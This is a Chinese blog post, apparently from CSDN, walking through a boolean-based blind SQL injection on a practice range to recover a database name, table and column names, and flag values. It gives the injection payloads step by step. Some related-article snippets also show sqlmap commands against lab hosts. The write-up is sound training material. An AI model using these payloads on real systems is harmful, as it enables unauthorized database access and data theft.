渗透测试(一)SQL盲注

最新推荐文章于 2022-05-15 19:38:15 发布
最新推荐文章于 2022-05-15 19:38:15 发布
阅读量397 收藏 1
点赞数
分类专栏: 渗透测试 网络安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_31830179/article/details/108283886
版权

SQL盲注一

测试靶场(掌控安全学院SQL注入靶场):https://hack.zkaq.cn/battle/target?id=1bd1990363f28cb9

  1. 找出原链接查询数据字段数

order by 3 时无数据了,则可判断字段数为2,可做接下来操作

  1. 试着找到当前数据库名长度(2.3步其实不用做)

and length(database())>11 尝试判断库名长度,测试为12

  1. 尝试将库名找出

and ascii(substr(database(),1,1))>=107 通过每个字母的ASCII码判断,以此查找12位字符,得到库名为:kanwolongxia

  1. 查找该库中有几张表

and (select count(table_name) from information_schema.tables where table_schema='kanwolongxia')=3

  1. 用第三步方法去尝试查找表名

and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1))>=6

找出第一个表名长度为 6 ,

and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1),1,1))>=108

依次判断出第一个表名的字符:loflag

  1. 通过上诉方法找到所有表名

loflag、news、user

PS :手动这样盲注要累死,所以还是使用工具吧,比如BurpSuite.

  1. 继续找loflag表中的字段

(1)找有多少个字段

and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='loflag')>=2

可判断为2个字段

(2)然后继续找出每个字段名各有多少个字符,同第5步(分别有2、6个字符,猜测第一个字段为id)

(3)找出字段名为:Id、flaglo

  1. 读取flaglo字段中的有用数据:

(1)第一个数据:8个字符

and length((select flaglo from loflag limit 0,1))>=8

查找为:zKaQ-QQQ

(2)第二个数据:7个字符

查找为:zKaQ-RD

(3)以此类推,找到正确flag就好了

Cobb_L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
盲注
weixin_53026460的博客
10-24 3136
盲注属于SQL注入的一种,SQL注入可以通过不同的类别来分类,比如按照传参方式分类SQL注入:GET、POST、HEAD(COOKIE),根据做法的不同,我们也可以把这些分类为盲注、报错注入和显错注入;盲注是什么?(一)布尔盲注布尔是一种类型,核心是在于判断正确与否。布尔就是指这个页面有回显,但是不会显示具体内容,只会显示语句是否正常执行;举个例子,这是一条存在sql注入的语句;在这里输入and 1=1;会发现页面显示有数据;将and 1=1修改为and 1=1;
渗透测试SQL注入
weixin_43988774的博客
04-02 5768
SQL注入 SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句 sql注入漏洞的产生需要满足 参数用户可控 - 前端传给后端的参数是用户可以控制的 参数代入数据库查询 - 传入的参数拼接到SQL语句,且带入数据库查询 sql注入漏洞的分类: 从注入点区分 数字型注入 字符型注入 从注入方式区分 报错注入 延时注入 堆叠注入(联合查询注入) 布尔注入(盲注) 宽字节注入 cookie
掌控者靶场第二章:WAF绕过
m0_56135391的博客
04-12 949
1.打开传送门 2.使用御剑或其它网站扫描工具对该页面进行扫描 扫描得到一个管理员登录界面以及疑似含有sql注入漏洞的界面 对该界面进行sql注入测试拼接语句orderby10 页面回显正常,输入order by 11,页面返回异常,验证含有10个字段 通过union拼接,查询是否含有admin表unionselect1,2,3,4,5,6,7,8,9,10fromadmin 页面提示传参错误,url中输入的sql注入语句被waf拦截,可以尝试将注入语句放入coo...
【封神台】SQL注入靶场练习(sqlmap)
00勇士王子的博客
11-01 1万+
靶场地址 https://hack.zkaq.cn 题目 解题过程 1.进入题目 2.只有个 点击查看新闻,点击进入 3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍 查询数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs 因为我们需要获得管理员密码,所以要查maoshe数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl
渗透测试基础-盲注(布尔盲注和时间盲注
weixin_45488495的博客
04-09 4270
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入——布尔盲注,延时盲注,宽字节注入
weixin_46601374的博客
02-27 2418
什么是盲注? 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注盲注函数 length() 函数 返回字符串的长度 ?id=1 and length(database())>1 substr() 截取字符串 , 从第一位截取一个 id=1 and substr(database(),1,1)='k' substr(内容,1,1) 显示第一个字符 ord()/ascii() 返回字符的ascii码 ..
31-31.渗透测试SQL注入盲注
最新发布
05-10
渗透测试SQL注入盲注
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文将更进一步,讨论SQL盲注,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先注册一个...
sql盲注检测的简单脚本.zip
03-10
6. **实际应用**:在Web应用的渗透测试中,SQL盲注检测脚本是必不可少的工具,帮助开发者及时发现并修复潜在的安全隐患,保障用户数据的安全。 7. **学习与实践**:了解和掌握SQL盲注的检测方法,对于提高Web应用的...
SQL盲注利用工具
11-15
使用此工具,安全研究人员或渗透测试人员可以模拟攻击场景,找出系统中的SQL盲注漏洞,并及时修复,防止真实攻击发生。 在使用BSQLInjector时,用户需要具备一定的Ruby编程知识,以及对SQL查询和网络安全的理解。...
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
SQL注入之基于布尔的盲注详解
09-10
总之,布尔型SQL盲注是一种高级的渗透测试技术,它要求攻击者具有深厚的SQL知识和耐心。同时,防御这种攻击也需要开发者具备良好的安全意识和严谨的编程习惯。对于开发者来说,了解这种攻击方式并采取相应的防护措施...
封神台旧靶场-kali系列
weixin_43446292的博客
02-15 3254
一、信息搜集之: 子域名探测 下载此字典:https://hack.zkaq.cn/file/down?id=f80ff6b197c0773b 然后利用layer进行子域名扫描,得到子域名为shop.aqlab.cn 二、信息搜集:端口扫描 namp对shop.aqlab.cn进行扫描,得到端口号为8001,flag为8001,根据上一关也可得知端口号为8001 三、漏洞扫描 - web扫描器 对http://shop.aqlab.cn:8001/进行目录扫描,flag在robots.txt目录下 四、注
渗透测试(二)SQL盲注
Cobb_L
08-31 264
盲注 2 测试靶场(掌控安全学院SQL注入靶场):https://hack.zkaq.cn/battle/target?id=21fbf961c6633d74 通过表单登录注入,原理与盲注1类似,仅存在传参方式问题。 找出此数据库存在的表 'or (select count(table_name) from information_schema.tables where table_schema=database())=3 # 以此得到共三张表 第一张表 'or length((select tab
24个常见渗透测试漏洞靶场列表
一只臭皮匠的博客
09-09 6640
0x01 在线靶场 BUUCTF在线评测:https://buuoj.cn Vulhub漏洞环境集合:https://vulhub.org 韩国Webhacking:https://webhacking.kr 重生信息安全在线靶场:https://bc.csxa.cn 网络信息安全攻防学习平台:http://hackinglab.cn 墨者学院在线靶场:https://www.mozhe.cn/bug 封神台在线演练靶场:https://hack.zkaq.cn/battle 安鸾渗透实战平台:http:
渗透测试基础-盲注
学习、分享、交流
05-15 1698
盲注:我们通过[判断的方式],去查询相关数据内容。
sql显错注入——靶场操作记录<掌控安全>
chick11的博客
09-28 2510
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
热门推荐
qq_51550750的博客
01-29 1万+
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
Web应用手工渗透测试—用SQLMap进行SQL盲注测试
weixin_34006468的博客
07-03 820
简介   本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffix and prefix )注入到数据库。本文将更进一步,讨论SQL盲注,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本...
SQL注入详解:执行系统命令与渗透测试
渗透测试人员使用各种工具来检测和利用SQL注入漏洞,如Burp Suite、SQLMap、Nessus等。这些工具可以帮助自动化检测SQL注入漏洞,并在安全环境中模拟攻击,以评估系统的安全性。 5. SQL盲注入 在盲注入中,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值